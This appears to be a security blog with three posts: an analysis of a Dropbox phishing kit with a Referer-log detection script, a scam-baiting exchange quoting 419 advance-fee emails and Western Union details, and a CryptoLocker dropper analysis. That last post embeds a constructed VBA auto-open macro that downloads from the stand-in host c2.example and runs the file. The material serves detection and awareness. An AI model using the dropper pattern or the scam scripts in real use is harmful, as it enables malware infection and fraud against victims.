
Tag: money

Phishing Attack #4 – Dropbox

Clone kit revealed

A new Dropbox-themed phishing campaign targeting users of the file sharing and storage platform is currently in circulation. The email invites recipients to view files shared by another Dropbox user and to click a link that leads to a phishing website.

[screenshot, 13 Oct 2016]

Rather than asking for Dropbox credentials, the page tries to fool users into submitting the username and password of their email account (Yahoo, Outlook, Gmail, AOL or others), in order to take over that account.

[screenshot]

Clicking on one of the provider icons opens a modal asking for credentials.

[screenshots]

Once the credentials are filled in and the "Submit" button is clicked, they are sent by email to the phisher.

Analyzing the web server, it was possible to retrieve the phishing kit ("clone kit") used by the attacker to build the site. The kit is very simple and written with basic programming skills. Below are the directory structure and the source code of submit.php; "form.php" and "index.php" are almost entirely HTML.

[screenshot]

The developer downloaded all the provider icons and serves them locally instead of hotlinking them from the real providers' sites, presumably so that those providers never see image requests (and referers) coming from the phishing domain that would give it away.

[screenshot]

[screenshot]

Dropbox could identify this campaign by looking at the HTTP Referer header of requests arriving at its site, because after the credentials are submitted the phishing page redirects the victim to the official Dropbox website, so the phishing domain shows up as the referer of those landing requests. The caveat is that the header is only present when the browser sends it (a referrer policy or an HTTPS-to-HTTP downgrade can strip it), but a kit this basic does nothing to hide it.
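As an added example that is not part of the original post, here is the detection idea above applied to web server logs: a Python script that parses combined-format access log lines, extracts the Referer host of each request, and reports any referring host that is neither the brand's own domain nor a known good source, ranked by the number of distinct clients it sent. The log lines, the domain names and the allow-list are constructed for this example.

```python
"""Flag Referer hosts that send traffic to a brand's landing pages.

A phishing kit that redirects victims to the real site after harvesting
credentials leaves its own domain in the HTTP Referer header of the request
that lands on the real site. This script parses Apache/nginx "combined" log
lines and groups untrusted referring hosts by how many victims they sent.
Added example; the log lines, domains and allow-list below are constructed.
"""
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed sample of combined-format access log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.10 - - [13/Oct/2016:11:26:48 +0000] "GET / HTTP/1.1" 200 5120 "http://dropbox-share-files.example/submit.php" "Mozilla/5.0"
203.0.113.11 - - [13/Oct/2016:11:27:01 +0000] "GET /login HTTP/1.1" 200 4300 "https://www.dropbox.com/home" "Mozilla/5.0"
203.0.113.12 - - [13/Oct/2016:11:27:16 +0000] "GET / HTTP/1.1" 200 5120 "http://dropbox-share-files.example/submit.php" "Mozilla/5.0"
203.0.113.13 - - [13/Oct/2016:11:27:24 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.14 - - [13/Oct/2016:11:28:32 +0000] "GET /home HTTP/1.1" 200 9000 "https://www.google.com/" "Mozilla/5.0"
203.0.113.15 - - [13/Oct/2016:11:29:00 +0000] "GET / HTTP/1.1" 200 5120 "http://203.0.113.99/dropbox/form.php" "Mozilla/5.0"
"""

# Apache/nginx "combined" log format: client, ident, user, [time], "request", status, size, "referer", "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Assumed allow-list: the brand's own domains plus referrers that legitimately send traffic.
OWN_DOMAINS = ("dropbox.com",)
TRUSTED_REFERERS = ("google.com", "bing.com", "duckduckgo.com")


def referer_host(referer):
    """Return the lowercase hostname of a Referer value, or None if absent ("-") or unparseable."""
    if not referer or referer == "-":
        return None
    host = urlsplit(referer).hostname
    return host.lower() if host else None


def is_trusted(host, own=OWN_DOMAINS, trusted=TRUSTED_REFERERS):
    """True if host is the brand itself or a known good referrer (exact or subdomain match only)."""
    return any(host == d or host.endswith("." + d) for d in own + trusted)


def suspicious_referers(log_text):
    """Parse log lines and collect untrusted referring hosts.

    Returns {referer_host: {"hits": n, "clients": set of client IPs, "paths": set of referer paths}}.
    """
    findings = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of aborting the whole run
        host = referer_host(m.group("referer"))
        if host is None or is_trusted(host):
            continue
        entry = findings.setdefault(host, {"hits": 0, "clients": set(), "paths": set()})
        entry["hits"] += 1
        entry["clients"].add(m.group("ip"))
        entry["paths"].add(urlsplit(m.group("referer")).path)
    return findings


def ranked(findings):
    """Referring hosts ordered by distinct victims (then hits), most first."""
    return sorted(findings, key=lambda h: (len(findings[h]["clients"]), findings[h]["hits"]), reverse=True)


if __name__ == "__main__":
    report = suspicious_referers(SAMPLE_LOG)
    for host in ranked(report):
        e = report[host]
        print(f"{host}: {e['hits']} hits from {len(e['clients'])} clients via {sorted(e['paths'])}")
```

Matching on exact host or subdomain (rather than a substring test) matters: a lookalike such as dropbox.com.evil.example must not pass as the brand itself. On real traffic the output is a list of candidate phishing hosts for takedown, with the referer path (here submit.php or form.php) hinting at the kit's structure.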



A nice conversation with a “scammer”

"The so-called "419" scam (aka "Nigeria scam" or "West African" scam) is a type of fraud named after an article of the Nigerian penal code under which it is prosecuted. It is also known as "Advance Fee Fraud" because the common principle of all the scam formats is to get the victim to send cash (or other items of value) upfront by promising them a large amount of money that they would receive later if they cooperate. In almost all cases, the criminals receive money using Western Union and MoneyGram, instant wire transfer services with which the recipient can't be traced once the money has been picked up. These services should never be used with people you only know by email or telephone!" (http://www.419scam.org)

Curious about that, I started a nice conversation with the Nigerian guy to see how the scam actually works.

Scammer

Dear Friend,

I am very happy to inform you about my success in getting that fund transferred. Now I want you to contact my secretary and ask him for a cheque worth USD$800,000 which I kept for you as compensation for your past assistance to me. His contact details are below:

Name:   John Izualo.

Email;  ( johnizualo6@yahoo.com )

Kindly reconfirm to him the following below information:


Your full name_________

Your address_______

Your country______

Your age__________ 

Your occupation______

Your Phone number_______


Note that if you do not send him the above information complete, he will not release the cheque to you because he has to be sure that it is you. Note also that I cannot be reached by email or phone at this moment because I am currently in London for an investment trip with my share.

Regards,

Dr.Peter Ikey Obi.

Me

Hello, I received this mail from Dr. Peter Ikey Obi.

I don't know how I helped him, but I'm very happy to receive this bonus.

Here are my details for the transfer.

Your full name______Davide XXXX

Your address_______Via dei XXX

Your country_______Italy

Your age___________59

Your occupation______Director Sales at XXX

Your Phone number_______+3934877XXXXX

Regards,

Scammer

DEAR Davide XXXX,

WELL, I RECEIVED YOUR EMAIL AND ITS CONTENT AND I HAVE MADE SOME INQUIRIES ACCORDING TO THE INSTRUCTIONS GIVEN TO ME BY MY BOSS BEFORE HE WENT TO LONDON, AND I WANT YOU TO DO ME A FAVOR NOW TOWARDS YOUR FUNDS IN A CERTIFIED BANK CHEQUE ($800,000.00 USD): DO YOU WANT TO RECEIVE IT THROUGH BANK TO BANK WIRE TRANSFER OR DO YOU WANT IT THROUGH DELIVERY FROM A COURIER COMPANY? I WANT YOU TO GET BACK TO ME TODAY CONCERNING THIS MATTER! AND IF YOUR CHOICE IS BANK TO BANK WIRE TRANSFER, PLEASE TRY TO FORWARD ME YOUR BANK ACCOUNT INFORMATION BECAUSE THE BANK HERE NEEDS IT TO TRANSFER YOUR FUND INTO YOUR ACCOUNT THERE, OK.


BUT IF YOUR CHOICE IS THROUGH A COURIER COMPANY, THEN I ALSO WANT YOU TO GET BACK TO ME AS SOON AS POSSIBLE, SO THAT I WILL MAKE THE REMAINING ARRANGEMENTS WITH THE COURIER COMPANY HERE CONCERNING HOW TO DELIVER YOUR CERTIFIED BANK CHEQUE OF $800,000.00 USD TO YOU, BECAUSE YOUR ADDRESS IS ALREADY RECEIVED HERE, OK.

THANKS AND HAPPY TO HEAR BACK FROM YOU,


YOURS SINCERELY,
JOHN IZUALO,
PHONE: +234-806-4228395.

Me

Hello Mr. John,

I would like to go through a courier company because I do not currently have my bank account available. What should I do?

Thanks

Best

Scammer

Dear Davide XXXX,

Well, I received your e-mail and its content, but inquiries I made today stated that delivering your cheque of USD$800,000.00 to you through a courier company will only cost you $195.92 for its delivery through FedEx.

You are required to send the delivery fee of $195.92 through Western Union or MoneyGram money transfer to the receiver's name information below, OK. As soon as you send the fee, get back to me with the MTCN and your cheque of $800,000.00 must be delivered to you without wasting any time, OK.

HERE IS THE RECEIVER'S NAME INFORMATION TO SEND THE REQUIRED FEE OF $195.92 THROUGH WESTERN UNION MONEY TRANSFER OR MONEY GRAM:


RECEIVER'S NAME: PETER NWAKOR

CITY: LAGOS

COUNTRY: NIGERIA

COUNTRY CODE: +234.

TEST QUESTION: IN GOD?

ANSWER: WE TRUST

Thanks,

Mr. John Izualo.

Phone: +234-806-4228395

Me

Hi, thanks a lot.

Tomorrow I will send the money. When will I receive the money?

Do you need more information to send the money?

Thanks a lot, thanks

Best

Everything was working fine and I was so happy to receive my payment of 800K $.

But I made a mistake: I waited too long to make the payment via Western Union, and my Nigerian friend became angry 🙁

He replied with the following:

Scammer

I am here to inform you that I have tried my best to make sure you receive your cheque, but I can see that you are not serious about it. Failure to comply with me by paying the fee today or tomorrow, I will return the cheque to my boss first thing on Monday morning.

The weekend started and I could not reach him anymore; he stopped answering. My yacht will have to wait... maybe the next scam will be the right one!!


INSIDE CRYPTOLOCKER C&C SERVER

History

"CryptoLocker was a ransomware trojan which targeted computers running Microsoft Windows and was first observed by Dell SecureWorks in September 2013. CryptoLocker propagated via infected email attachments, and via an existing botnet; when activated, the malware encrypts certain types of files stored on local and mounted network drives using RSA public-key cryptography, with the private key stored only on the malware's control servers. The malware then displays a message, which offers to decrypt the data if a payment (through either Bitcoin or a pre-paid cash voucher) is made by a stated deadline, and threatened to delete the private key if the deadline passes. If the deadline is not met, the malware offered to decrypt data via an online service provided by the malware's operators, for a significantly higher price in Bitcoin." (Wikipedia)

Infection Process

The CryptoLocker infection process starts when the Microsoft Word document attached to the email is opened. Word allows documents to carry macro code (VBA), and a macro placed in an auto-execute entry point such as AutoOpen or Document_Open runs as soon as the document is opened, provided the user enables macros when Word asks.

“A macro is a series of commands and actions that help to automate some tasks – effectively a program but usually quite short and simple. However they are created, they need to be executed by some system which interprets the stored commands” (Wikipedia)

Analyzing the documents we received through a suspicious mail, we extracted the macro inside. The macro used by the attackers to infect the machine is a Visual Basic module that creates new files inside the TEMP folder and downloads the real malware from a C&C server with an HTTP GET request. To avoid antivirus detection, the downloaded file is disguised as a .PNG image but actually contains VB code.

Here is a sample taken from the original macro that shows how the dropper communicates with its C&C server and how the code is obfuscated.

CODE

Many characters have been replaced with (xx) on purpose. The macro we found is a VBA module with many functions that stage the malware and download the real .exe from another server.
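The analysis side of what is described above, as an added example that is not the post's code or the real macro: a Python triage script that decodes Chr()/ChrW() string obfuscation, replays simple VBA string-concatenation assignments to recover hidden values such as the download URL and the %TEMP% drop path, and flags auto-execute entry points (AutoOpen, Document_Open, ...) together with download and execution APIs. The macro text embedded in it is a constructed sample, including the hypothetical host c2.example and the file names.

```python
"""Static triage of a VBA macro dropper.

Decodes Chr()/ChrW()/Chr$() obfuscation, replays plain `var = a & b & ...`
assignments to recover hidden strings, and flags auto-execute entry points
plus download/execution APIs. Added example; the macro below is a constructed
sample with a hypothetical C&C host, not the real CryptoLocker dropper.
"""
import re

# Constructed VBA sample (hypothetical host c2.example and file names).
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim q As String
    q = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47)
    q = q & "c2.example" & Chr(47) & "img" & Chr(47) & "logo.png"
    Dim p As String
    p = Environ("TEMP") & "\" & "up" & "date.exe"
    Dim x As Object
    Set x = CreateObject("MSXML2.XMLHTTP")
    x.Open "GET", q, False
    x.Send
    Shell p, vbHide
End Sub
'''

# Entry points Office runs automatically, and APIs typical of download-and-execute droppers.
AUTOEXEC = ("AutoOpen", "Document_Open", "AutoExec", "Workbook_Open", "AutoClose")
SUSPICIOUS_APIS = ("URLDownloadToFile", "XMLHTTP", "WinHttpRequest", "ADODB.Stream",
                   "Shell", "WScript.Shell", "Environ", "CreateObject")

CHR_RE = re.compile(r'Chr[W\$]?\((\d+)\)', re.IGNORECASE)
ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+)$')
URL_RE = re.compile(r'https?://[^\s"\'<>]+')


def decode_chr(line):
    """Replace Chr(n)/ChrW(n)/Chr$(n) calls with the equivalent quoted VBA literal."""
    return CHR_RE.sub(lambda m: '"' + chr(int(m.group(1))).replace('"', '""') + '"', line)


def split_concat(expr):
    """Split a VBA concatenation expression on '&' occurring outside string literals."""
    parts, cur, in_str = [], [], False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        if ch == '&' and not in_str:
            parts.append(''.join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    parts.append(''.join(cur).strip())
    return parts


def eval_part(part, env):
    """Evaluate one operand: literal, Environ("X") kept symbolic as %X%, or a known variable."""
    if len(part) >= 2 and part.startswith('"') and part.endswith('"'):
        return part[1:-1].replace('""', '"')
    m = re.fullmatch(r'Environ\("(\w+)"\)', part, re.IGNORECASE)
    if m:
        return "%" + m.group(1).upper() + "%"
    return env.get(part, "<" + part + ">")


def recover_strings(vba):
    """Replay `var = ...` string assignments in order; returns {variable: recovered value}."""
    env = {}
    for raw in vba.splitlines():
        m = ASSIGN_RE.match(decode_chr(raw.strip()))
        if not m:
            continue  # Dim/Set/method calls carry no string assignment we can replay
        var, expr = m.group(1), m.group(2)
        env[var] = "".join(eval_part(p, env) for p in split_concat(expr))
    return env


def triage(vba):
    """Return entry points, suspicious APIs, recovered URLs and decoded strings for a macro."""
    strings = recover_strings(vba)
    searchable = vba + "\n" + "\n".join(strings.values())
    return {
        "entry_points": [n for n in AUTOEXEC if re.search(r'\b' + n + r'\b', vba, re.IGNORECASE)],
        "apis": [a for a in SUSPICIOUS_APIS if a.lower() in vba.lower()],
        "urls": sorted(set(URL_RE.findall(searchable))),
        "strings": strings,
    }


def is_dropper_like(report):
    """Heuristic verdict: auto-executes, fetches over HTTP, and runs something locally."""
    downloads = any(a in report["apis"] for a in ("URLDownloadToFile", "XMLHTTP", "WinHttpRequest"))
    executes = any(a in report["apis"] for a in ("Shell", "WScript.Shell"))
    return bool(report["entry_points"]) and downloads and executes


if __name__ == "__main__":
    r = triage(SAMPLE_MACRO)
    for key in ("entry_points", "apis", "urls", "strings"):
        print(f"{key}: {r[key]}")
    print("dropper-like:", is_dropper_like(r))
```

The point of replaying the assignments rather than only grepping for "http" is that the URL never appears in the source as a whole: it is assembled from Chr() calls and fragments across several statements, which is exactly the obfuscation the post describes. Real macros add noise (dead code, arithmetic on the character codes, StrReverse, Split/Join), so a tool such as olevba goes much further; the script shows the principle.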

After the dropper runs the downloaded executable, the malware encrypts the victim's personal files with public-key cryptography (RSA, as described in the history above; in practice each file is encrypted with a symmetric key which is in turn encrypted with the RSA public key), while the matching private key is held only on the C&C server, together with a payment deadline after which the operators threaten to delete it.


Read more about this analysis here: DOWNLOAD LINK
